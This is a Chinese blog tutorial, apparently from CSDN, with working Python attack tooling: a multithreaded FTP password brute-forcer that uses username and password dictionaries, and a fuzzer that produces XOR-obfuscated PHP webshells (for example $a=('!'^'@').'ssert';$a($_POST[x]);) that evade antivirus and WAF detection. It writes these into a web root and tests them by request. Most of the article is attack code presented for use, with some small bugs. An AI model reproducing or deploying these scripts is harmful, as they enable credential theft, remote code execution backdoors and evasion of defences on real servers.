【Python】多线程Fuzz&&Waf异或免杀&爆破

最新推荐文章于 2024-07-05 18:31:23 发布
最新推荐文章于 2024-07-05 18:31:23 发布
阅读量564 收藏 5
点赞数 3
分类专栏: python 文章标签: python
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/dive668/article/details/115588042
版权

【Python】多线程Fuzz&Waf异或免杀&爆破

注意sys.argv传参数必要时需要转换int型。

学习内容和目的

知识点:协议模块使用,Request爬虫技术,简易多线程技术,编码技术,Bypass后门技术
学习目的:掌握利用强大的模块实现各种协议连接操作(爆破或利用等),配合Fuzz吊打Waf

简单多线程脚本

queue,threading模块使用

利用FTP模块实现协议爆破脚本

1.ftplib模块使用
2.遍历用户及密码字典
3.尝试连接执行命令判断

不含多线程简单爆破

import ftplib
import sys
def ftp_brute():
	ftp=ftplib.FTP()
	ftp.connect('192.168.0.101',21)
	for username in open('ftp-user.txt'):
		for password in open('ftp-pass.txt'):
			username=username.replace('\n','')
			password=password.replace('\n','')
			try:
				ftp.login(username,password)
				list=ftp.retrlines('list')
				print(list)
				print(username+'|'+password+'ok')
			except ftplib.all_errors:
				pass
if __name__ == '__main__':
	ip=sys.argv[1]
	ftp_brute()
引入queue和threading
import ftplib
import sys
import queue
import threading
def ftp_brute():
	ftp=ftplib.FTP()
	ftp.connect('192.168.0.101',21)
	while not q.empty():
		dict=q.get()
		dict=dict.split('|')
		username=dict[0]#因为q里面有|,分隔后每个q含有两项。
		password=dict[1]
		try:
			ftp.login(username,password)
			list=ftp.retrlines('list')
			print(list)
			print(username+'|'+password+'ok')
		except ftplib.all_errors:
			pass
	
	
			
if __name__ == '__main__':
	q=queue.Queue()
	for username in open('ftp-user.txt'):
		for password in open('ftp-pass.txt'):
			username=username.replace('\n','')
			password=password.replace('\n','')
			zidian=username+'|'+password
			q.put(zidian)
	for x in range(10):#10是线程数
		t=threading.Thread(target=ftp_brute)#函  数不加()
		t.start()

添加参数:

import ftplib
import sys
import queue
import threading
def ftp_brute(ip,port):
	ftp=ftplib.FTP()
	ftp.connect(ip,int(port))
	while not q.empty():
		dict=q.get()
		dict=dict.split('|')
		username=dict[0]#因为q里面有|,分隔后每个q含有两项。
		password=dict[1]
		try:
			ftp.login(username,password)
			list=ftp.retrlines('list')
			print(list)
			print(username+'|'+password+'ok')
		except ftplib.all_errors:
			pass
	
	
			
if __name__ == '__main__':
	ip=sys.argv[1]
	port=sys.argv[2]
	userfile=sys.argv[3]
	passfile=sys.argv[4]
	threading_num=sys.argv[5]

	q=queue.Queue()
	for username in open(userfile):
		for password in open(passfile):
			username=username.replace('\n','')
			password=password.replace('\n','')
			zidian=username+'|'+password
			q.put(zidian)
	for x in range(10):#10是线程数
		t=threading.Thread(target=ftp_brute,args=(ip,int(port)))#参数名args
		t.start()

配合Fuzz实现免杀异或Shell脚本

1.免杀异或Shell原理讲解及开发思路(参考及举例:^!@,"?等)
2.基于Fuzz思路生成大量Payload代码并有序命名写入到网站文件中。
3.基于多线程实现批量访问Shell文件并提交测试是否正常连接回显。

PHP异或
通过^进行异或运算:

<?php $a=("!"^"@").'ssert';$a($_POST[x]);?>

要把!@对应的二进制的ASCII码异或运算。得到的是a。免杀绕过的是assert。
如何去生成更多个a的运算符?

  • 1.搞清楚算法,一个个反推。
  • 2.遍历查找,看那个匹配a。

把后门木马写入www文件夹下,一个个测试request访问,看那个成功。

for i in range(1,127):
	for ii in range(1,127):
		code="<?php $a="+"'"+chr(i)+"('"+"^"+"'"+chr(ii)+"')"+".'ssert';$a($_POST[x]);?>"
		with open("E:/securitytools/phpstudy_pro/WWW"+str(i)+'xs'+str(ii)+'.php','a+') as f:
			f.write(code)
			f.close()

在这里插入图片描述
请求:
127.0.0.1/x/33xs64.php
传入参数
x=phpinfo()
可以看到等待assert命令的执行。
在这里插入图片描述

添加requests判断结果
import requests

for i in range(1,127):
	for ii in range(1,127):
		code="<?php $a="+"('"+chr(i)+"'"+"^"+"'"+chr(ii)+"')"+".'ssert';$a($_POST[x]);?>"
		with open("E:/securitytools/phpstudy_pro/WWW/x/"+str(i)+'xs'+str(ii)+'.php','a+') as f:
			f.write(code)
			f.close()
		url='http://127.0.0.1/x/'+str(i)+'xs'+str(ii)+'.php'
		data={
			'x':'phpinfo()'
		}
		result=requests.post(url,data=data).content.decode('utf-8')
		if 'xxx' in result:
			print('Bypass ok->'+str(i)+'xs'+str(ii)+'.php')
			print(code)
		#else
			#print(str(i)+'xs'+str(ii)+'.php'+'|No')

无子符后门,
assert中的每个字符都可以拆分。$a也可以拆分。
webshell免杀

多线程代码

原型代码,编译代码。

import requests
import time 
import threading,queue

def string():
	while not q.empty():
		filename=q.get()
		url='http://127.0.0.1/x/'+filename
		datas={
			'x':'phpinfo();'
		}
		result=requests.post(url,datas=datas).content.decode('utf-8')
		if 'xxx' in result:
			print('check->'+filename+'->OK')
		else:
			print('check->'+filename+'->No')
		time.sleep(1)

def shell_test_check():
	url='http://127.0.0.1/x/33x64.php'
	datas={
		'x':'phpinfo();'
	}
	result=requests.post(url,datas=datas).content.decode('utf-8')
		if 'xxx' in result:
			print('ok')

if __name__ == '__main__':
	q=queue.Queue()
	for i in range(1,127):
		for ii in range(1,127):
			payload="'"+chr(i)+"'"+"^"+"'"+chr(ii)+"'"
			code="<?php $a=("+payload+").'ssert';$a($_POST[x]);?>"
			filname=str(i)+'xd'+str(ii)+'.php'
			q.put(filename)
			with open('D://xxxx/www/x'+filename,'a') as f:
				f.write(code)
				f.close()
				print('Fuzz文件生成成功')
	for x in range(20):
		t=threading.Thread(target=string)
		t.start()
TIGER1693
关注
  • 3
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
FUZZ爆破字典.rar
08-03
"FUZZ爆破字典.rar"是一个专门用于FUZZ测试的资源包,它包含了各种可能的输入数据,这些数据可以作为种子,帮助测试者寻找程序中的漏洞。 FUZZ测试的核心思想是生成或选择大量的随机或半随机数据(通常称为“字典”...
推荐一款字典爆破工具 -- FuzzPayloadGennerator
Python栈
06-27 1155
一款BurpSuite插件,主要是解决我日常爆破时字典的需要,收集的字典数据太多了,有时想要指定特征的爆破字典就要自己手撸, 所以就想着写个插件了,可以自己通过配置生成字典了, 未来会持续写,把日常可能使用到的都实现了,主要是太懒了。
fuzz测试和ssh私钥认证爆破的一次渗透
tpaer的博客
10-05 920
Empire:LupinOne靶场通过信息收集fuzz测试出隐藏ssh私钥的文件,并对其进行爆破解密进行登录,最后进行提权。
免杀笔记 ----> ShellCode Loader !!!
最新发布
huohaowen的博客
07-05 943
学了那么久的前置知识,终于到了能上线的地方了!!!不过这里还没到免杀的部分,距离bypass一众的杀毒软件还有很长的路要走!!
业务逻辑攻防-Fuzz模糊测试篇&JS算法口令&隐藏参数&盲Payload&未知文件目录
siu~
01-18 1649
1、Fuzz技术应用-用户口令(弱口令) 2、Fuzz技术应用-目录文件(泄漏点) 3、Fuzz技术应用-未知参数(利用参数) 4、Fuzz技术应用-Payload(Bypass)
Fuzz工具使用详解
qq_22132931的博客
10-15 7927
wfuzz工具使用详解
python s7协议_Scapy Fuzz实现——S7协议从建连到“正常交流“(一)
weixin_39755625的博客
12-08 381
转载:安全客酝酿了“三秒钟“,准备理清逻辑写写我学习的心得,自认为和Siemens S7协议有过一段时间浅浅的“交流”,所以这过程中涉及到了自己整理的自认为有用的东西,涉及工具、脚本这般,发出来让大家都能看到,逻辑也许简单,但努力写的尽量不那么的潦草。0x01 环境介绍Kali 2.0、Python2.7、Pycharm0x02 初次尝试都说scapy是很强势的第三方库,很多人用它实现端口扫描,那...
api-fuzzpython restful api模糊测试
02-05
快速开始将curl请求体放进request.txt文件中,执行命令python IntelliFuzzTest_cli.py request.txt特色支持请求身体体变异支持请求url path变异随机增删请求标头支持发布/获取/删除/放入方法可以直接根据curl命令...
API fuzz字典 api爆破字典
03-25
因为找了很久有些是比较古老的字典,一直没收获,直到自己去整了一个。 字典包含我在野外看到的 API 函数名称。 所有 API 函数名称动词 所有 API 函数名称名词 API 函数名动词,前导字符大写 函数名称动词,前导...
生成数独游戏的python程序fuzz.zip
12-17
标题中的“生成数独游戏的python程序fuzz.zip”表明这是一个使用Python编程语言编写的程序,用于自动生成数独游戏。数独是一种逻辑谜题,玩家需要填充一个9x9的网格,使得每一行、每一列以及每一个宫(3x3的小网格)...
python 网络协议仿真_Fuzzowski:一款功能强大的网络协议模糊测试工具
weixin_39786617的博客
12-23 682
原标题:Fuzzowski:一款功能强大的网络协议模糊测试工具FuzzowskiFuzzowski的设计核心理念,就是想让任何一个网络安全从业人员都会第一选择去使用它,该工具可以帮助研究人员对网络协议进行模糊测试,并且能够在整个测试过程中给我们提供帮助。除此之外,该工具还允许研究人员定义链接,并帮助识别服务的崩溃。功能介绍1、基于Sulley Fuzzer实现数据收集功能【】2、基于BooFuzz...
78 Python开发-多线程Fuzz&Waf异或免杀&爆破
山兔的博客
01-03 1052
通过ftp模块的学习,大家可以去写个其它协议的,比如mysql或者sqlserver的,模块打上去就完事了,就可以用这个模块进行连接操作。ftp软件这边是可以看到日志的,到时候我们爆破的时候可以看一下有没有登录日志,看一下是不是正常的。python里面基本上都有相对应的支持协议模块的库,我们就可以使用相关的库进行相关协议的连接。协议模块使用,Request爬虫技术,简易多线程技术,编码技术,Bypass后门技术。掌握利用强大的模块实现各种协议连接操作(爆破或利用等),配合Fuzz吊打WAF等。
Python安全开发——多线程Fuzz&Waf 异或免杀&爆破
qi_SJQ_的博客
02-23 1429
1.概述: 知识点: 协议模块使用,Request 爬虫技术,简易多线程技术,编码技术,Bypass 后门技术 目的: 掌握利用强大的模块实现各种协议连接操作(爆破或利用等),配合 Fuzz 吊打 WAF 等 2.简单多线程技术、FTP 模块实现协议爆破脚本: queue,threading 模块使用、ftplib 模块使用:遍历用户及密码字典、尝试连接执行命令判断 ftp模块使用:https://www.cnblogs.com/xiao-apple36/p/9675185.html https://
【无标题】
qq_56426046的博客
02-17 1039
通过以上的学习,学习到了非常多的技巧,例如 nmap端口信息枚举、Web页面信息枚举、dirb目录爆破、多方法绕过WAF、linpeas.sh信息枚举、JWT令牌分析、c-jwt-cracker工具解密等。后来,错过也成了人间常态。
模糊搜索利器:Python的thefuzz模块详解
XiaoqiangClub的博客
10-06 522
thefuzz模块是Python的一个第三方库,它提供了一组用于字符串匹配的函数和工具。通过使用thefuzz模块,我们可以计算字符串之间的相似度,并找到相似的匹配项。这在许多场景中都非常有用,比如在搜索引擎中实现模糊搜索,或者在数据清洗时找到相似的记录。支持多种字符串相似度算法,如Levenshtein距离、Damerau-Levenshtein距离、Jaro距离等。提供了灵活的接口,可以方便地计算字符串之间的相似度。支持批量处理,可以高效地处理大量字符串。
chatgpt赋能Python-python_fuzz
aijinglingchat的博客
05-23 238
在计算机科学中,模糊测试(fuzz testing)又称为随机测试或黑盒测试,是一种软件测试方法,其目的是发现软件中的未预期的行为。该技术通过自动生成(或随机选择)数据输入来检测程序中的错误。它是一种被广泛应用于安全测试和软件质量保证的方法。Python Fuzz是一种基于Python语言的模糊测试工具。它能快速、自动且高效地完成模糊测试,是一种广泛应用于软件开发和安全测试的方法。Python Fuzz不仅可以检测程序中的错误,还可以帮助开发者找出程序中潜在的安全漏洞。
PKav HTTP Fuzzer 爆破带有简单验证码的系统
热门推荐
Geekwei的博客
04-25 2万+
登录窗口设置了验证码,一般的暴力破解工具还不能绕过验证码,这下就不得不介绍一款国产神器Pkav HTTP Fuzzer ,哈哈,没错,前面我那是记的流水账,这才是我真正想同大家分享的。PKav HTTP Fuzzer 能爆破带有简单验证码的后台,下面我就给大家演示下如何使用PKav HTTP Fuzzer。
子域名探测---子域名爆破工具FuzzDomain、subDomainsBrute&&Web渗透&&Nikto学习使用
永不垂头的博客
08-20 2162
子域名探测—子域名爆破工具FuzzDomain、subDomainsBrute&&Web渗透&&Nikto学习使用 文章目录子域名探测---子域名爆破工具FuzzDomain、subDomainsBrute&&Web渗透&&Nikto学习使用前言一、子域名探测二、FuzzDomain三、subDomainsBrute四、Web渗透五、Nikto学习使用:六、我的公众号 前言 子域名探测相关学习及其 工具原理应运与理解 一、子域名探测 二、F
漏洞挖掘之乱拳打死老师傅——Fuzzer
海阔天空
10-14 1万+
背景 Fuzzer是一种通过产生一系列非法的、非预期的或者随机的输入向量给目标程序,从而完成自动化的触发和挖掘目标程序中的安全漏洞的软件测试技术。相比于形式化的软件漏洞测试技术(比如,符号执行技术 ),Fuzzer往往能够在实际的应用中挖掘更多的漏洞。形式化的漏洞挖掘技术的优势在于其不需要实际执行程序,然而在处理程序底层的某些操作(比如函数的虚指针)时,现有的符号执行技术往往不能做到精准的分析。...
绕过软WAF技巧:Python基础与Fuzz脚本实战
"该资源是漏洞银行大咖面对面技术讲座的一部分,由@13nR主讲,主题为‘1000种姿势’绕过软WAF,旨在探讨如何利用编程技巧来规避Web应用防火墙(WAF)的检测。讲座内容涵盖了Python基础知识和使用Python的requests库...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值